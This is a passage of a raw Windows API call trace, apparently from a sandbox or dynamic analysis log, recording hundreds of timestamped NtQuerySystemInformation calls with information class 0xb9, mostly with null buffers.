NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x28, ResultLength=0x0) [0236.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d830, Length=0x20, ResultLength=0x0) [0236.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7b0, Length=0x20, ResultLength=0x0) [0236.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7b0, Length=0x20, ResultLength=0x0) [0236.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7b0, Length=0x20, ResultLength=0x0) [0236.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da70, Length=0x38, ResultLength=0x0) [0236.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da70, Length=0x38, ResultLength=0x0) [0236.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8f0, Length=0x20, ResultLength=0x0) [0236.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d880, Length=0x20, ResultLength=0x0) [0236.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d880, Length=0x20, ResultLength=0x0) [0236.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db50, Length=0x58, ResultLength=0x0) [0236.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da70, Length=0x38, ResultLength=0x0) [0236.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8a0, Length=0x28, ResultLength=0x0) [0236.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8a0, Length=0x28, ResultLength=0x0) [0236.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8a0, Length=0x28, ResultLength=0x0) [0236.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8a0, Length=0x28, ResultLength=0x0) [0236.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d910, Length=0x28, ResultLength=0x0) [0236.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da70, Length=0x38, ResultLength=0x0) [0236.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x28, ResultLength=0x0) [0236.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x28, ResultLength=0x0) [0236.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da70, Length=0x38, ResultLength=0x0) [0236.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8f0, Length=0x20, ResultLength=0x0) [0236.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x20, ResultLength=0x0) [0236.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x20, ResultLength=0x0) [0236.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x20, ResultLength=0x0) [0236.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0236.882] NtQuerySystemInformation (SystemInformationClass=0xb9, 